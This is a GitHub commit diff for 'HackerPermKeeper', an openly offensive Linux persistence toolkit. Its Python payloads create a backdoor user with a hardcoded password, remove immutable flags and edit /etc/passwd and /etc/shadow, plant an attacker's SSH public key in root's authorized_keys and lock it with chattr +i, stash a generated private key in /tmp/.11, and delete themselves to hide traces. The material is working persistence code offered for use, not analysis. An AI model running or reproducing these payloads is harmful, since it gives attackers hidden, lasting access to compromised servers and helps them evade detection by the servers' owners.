Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
RuoJi6 authored Sep 25, 2023
1 parent 8dae126 commit c5bbb2a
Show file tree
Hide file tree
Showing 6 changed files with 76 additions and 34 deletions.
4 changes: 2 additions & 2 deletions config.py
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@


def configs():
print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red'))
print('OpenSSH后门 优点:直接重置目标服务器的OpenSSH,在里面写入万能密码以及记录ssh明文账户代码 '' 缺点:需要依大量的依赖环境,而且只能使用低版本系统,目前经过测试的有乌班图14',colored('[建议指数:*]\n', 'red'))

Expand Down Expand Up @@ -52,7 +52,7 @@ def configs():
print('检测对方服务器适合什么类型的权限维持模块', colored('[*****]', 'red'))

def configss():
print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red'))
print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red'))
print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red'))
Expand Down
2 changes: 1 addition & 1 deletion main.py
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ def ml(command):
# print('No')

try:
name = colored('HackerPermKeeper v2.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green')
name = colored('HackerPermKeeper v4.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green')
arg = ArgumentParser(description=name) # 创建解析器, description内容就是
arg.add_argument("-m", "--multiple", help="选择权限维持模块 -m 1")
arg.add_argument("-c", "--config", help="查看支持的权限维持模块 -c 1,查看详细使用说明 -c 2 ")
Expand Down
17 changes: 12 additions & 5 deletions payload/2adduser/adduser.py
Original file line number Diff line number Diff line change
Expand Up @@ -37,10 +37,17 @@ def adduser(user, password):


def deluser(user):
command = "sed -i '/^" + user + ":/d' /etc/shadow"
ml(command)
command = "sed -i '/^" + user + ":/d' /etc/passwd"
ml(command)
try:
ml('chattr -i /etc/passwd')
ml('chattr -i /etc/shadow')
command = "sed -i '/^" + user + ":/d' /etc/shadow"
# "sed -i '/^passw123:/d' /etc/shadow"
ml(command)
command = "sed -i '/^" + user + ":/d' /etc/passwd"
ml(command)
except Exception as e:
pass


def delete_current_script():
try:
Expand All @@ -53,6 +60,6 @@ def delete_current_script():
if __name__ == '__main__':
user = 'passw123'
password = 'admin@#45123'
deluser(user) # 删除用户
adduser(user, password)
# deluser(user) #删除用户
delete_current_script() # 删除当前执行脚本文件
21 changes: 13 additions & 8 deletions payload/2adduser/adduser_new_user.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
from __future__ import print_function
import subprocess
import sys,os
import requests

def ml(command):
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Expand Down Expand Up @@ -33,6 +34,17 @@ def adduser(user, password):
else:
print("----------------------->失败<-----------------------")

def deluser(user):
try:
ml('chattr -i /etc/passwd')
ml('chattr -i /etc/shadow')
command = "sed -i '/^" + user + ":/d' /etc/shadow"
ml(command)
command = "sed -i '/^" + user + ":/d' /etc/passwd"
ml(command)
except Exception as e:
pass

def delete_current_script():
try:
script_path = os.path.abspath(sys.argv[0])
Expand All @@ -41,16 +53,9 @@ def delete_current_script():
except Exception as e:
print("无法删除当前脚本文件:", e)

def deluser(user):
command = "sed -i '/^" + user + ":/d' /etc/shadow"
ml(command)
command = "sed -i '/^" + user + ":/d' /etc/passwd"
ml(command)


if __name__ == '__main__':
user = 'passw123'
password = 'admin@#45123'
deluser(user) # 删除用户
adduser(user, password)
# deluser(user) #删除用户
delete_current_script() # 删除当前执行脚本文件
16 changes: 15 additions & 1 deletion payload/6sshkey/sshkey_local.py
Original file line number Diff line number Diff line change
Expand Up @@ -75,17 +75,31 @@ def delete_current_script():
except Exception as e:
print("无法删除当前脚本文件:", e)

def delsshKey(user):
try:
if 'root' in user:
ml('chattr -i /root/.ssh')
ml('chattr -i /root/.ssh/authorized_keys')
ml('rm -rf /root/.ssh/authorized_keys')
else:
ml('chattr -i /home/'+user+'/.ssh')
ml('chattr -i /home/'+user+'/.ssh/authorized_keys')
ml('rm -rf /home/' + user + '/.ssh/authorized_keys')
except Exception as e:
pass

if __name__ == '__main__':
id_ed25519_pub = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF9OQyvU7TkC4Julezg31Lbj2YB3RSwhmM0yJwwtO4iK kali@kali"
# 调用 miyue 函数来在文件末尾写入新内容
# ssh-keygen -t ed25519 -N "admin!@#45123"
user = ml('whoami').strip()
delsshKey(user)
try:
miyue("HostKey /etc/ssh/ssh_host_ed25519_key")
miyue("PubkeyAuthentication yes")
miyue("AuthorizedKeysFile .ssh/authorized_keys")
except Exception as e:
print('低权限用户配置文件写入失败,有的低权限用户不影响使用')
user = ml('whoami').strip()
if 'root' in user:
root_authorized_keys(id_ed25519_pub)
ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys')
Expand Down
50 changes: 33 additions & 17 deletions payload/6sshkey/sshkey_target.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,8 @@
# !/usr/bin/env python
from __future__ import print_function
import subprocess
import os,sys
import os, sys


def ml(command):
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
Expand All @@ -26,7 +27,7 @@ def miyue(new_content):
file.write(new_content + '\n')


def generate_ssh_key(password,user):
def generate_ssh_key(password, user):
if 'root' in user:
command = 'ssh-keygen -t ed25519 -N "' + password + '" -q -f /' + user + '/.ssh/id_ed25519'
else:
Expand All @@ -40,18 +41,20 @@ def generate_ssh_key(password,user):
print("SSH密钥生成失败。错误信息:")
print(error.decode())

def file_key(user,keyt):

def file_key(user, keyt):
if 'root' in user:
file_path = "/" + user + "/.ssh/authorized_keys"
else:
file_path = "/home/" + user + "/.ssh/authorized_keys"
if os.path.exists(file_path):
print("文件写入成功")
id_ed25519(user,keyt)
id_ed25519(user, keyt)
else:
print("文件写入失败")

def id_ed25519(user,keyt):

def id_ed25519(user, keyt):
if 'root' in user:
file_path = "/" + user + "/.ssh/id_ed25519.pub"
file_path2 = "/" + user + "/.ssh/id_ed25519"
Expand All @@ -62,42 +65,55 @@ def id_ed25519(user,keyt):
print("id_ed25519.pub&id_ed25519删除失败")
else:
print("id_ed25519.pub&id_ed25519删除成功")
print('----->利用成功,生成的用户为:',ml('whoami').strip(),'<-----')
print('----->连接命令: ssh -i 密钥文件 '+ str(ml('whoami').strip())+'@ip <-----')
print('请下载{'+keyt+'}密钥文件连接')

print('----->利用成功,生成的用户为:', ml('whoami').strip(), '<-----')
print('----->连接命令: ssh -i 密钥文件 ' + str(ml('whoami').strip()) + '@ip <-----')
print('请下载{' + keyt + '}密钥文件连接')


def delete_current_script():
try:
script_path = os.path.abspath(sys.argv[0])
os.remove(script_path)
print("当前脚本文件已成功删除"+script_path)
print("当前脚本文件已成功删除" + script_path)
except Exception as e:
print("无法删除当前脚本文件:", e)


def delsshKey(user):
try:
if 'root' in user:
ml('chattr -i /root/.ssh')
ml('chattr -i /root/.ssh/authorized_keys')
else:
ml('chattr -i /home/' + user + '/.ssh')
ml('chattr -i /home/' + user + '/.ssh/authorized_keys')
except Exception as e:
pass


if __name__ == '__main__':
# 调用 miyue 函数来在文件末尾写入新内容
# 调用 generate_ssh_key 函数生成SSH密钥对
user = ml('whoami').strip()
delsshKey(user)
try:
miyue("HostKey /etc/ssh/ssh_host_ed25519_key")
miyue("PubkeyAuthentication yes")
miyue("AuthorizedKeysFile .ssh/authorized_keys")
except Exception as e:
print('低权限用户配置文件写入失败,有的低权限用户不影响使用')
user = ml('whoami').strip()
password = "admin!@#45123"
keyt = '/tmp/.11'
generate_ssh_key(password,user)
generate_ssh_key(password, user)
if 'root' in user:
ml('cat /' + user + '/.ssh/id_ed25519.pub >> /' + user + '/.ssh/authorized_keys && chmod 600 /' + user + '/.ssh/authorized_keys && chmod 700 /' + user + '/.ssh/')
ml('cp /' + user + '/.ssh/id_ed25519 '+keyt)
ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /'+ user + '/.ssh/id_ed25519.pub')
ml('cp /' + user + '/.ssh/id_ed25519 ' + keyt)
ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /' + user + '/.ssh/id_ed25519.pub')
ml('chattr +i /' + user + '/.ssh && chattr +i /' + user + '/.ssh/authorized_keys')
else:
ml('cat /home/' + user + '/.ssh/id_ed25519.pub >> /home/' + user + '/.ssh/authorized_keys && chmod 600 /home/' + user + '/.ssh/authorized_keys && chmod 700 /home/' + user + '/.ssh/')
ml('cp /home/' + user + '/.ssh/id_ed25519 '+keyt)
ml('rm -rf /home/' + user + '/.ssh/id_ed25519 && rm -rf /home/'+ user + '/.ssh/id_ed25519.pub')
ml('cp /home/' + user + '/.ssh/id_ed25519 ' + keyt)
ml('rm -rf /home/' + user + '/.ssh/id_ed25519 && rm -rf /home/' + user + '/.ssh/id_ed25519.pub')
ml('chattr +i /home/' + user + '/.ssh && chattr +i /' + user + ' /home/.ssh/authorized_keys')
file_key(user,keyt)
file_key(user, keyt)
delete_current_script() # 删除当前执行脚本文件

0 comments on commit c5bbb2a

Please sign in to comment.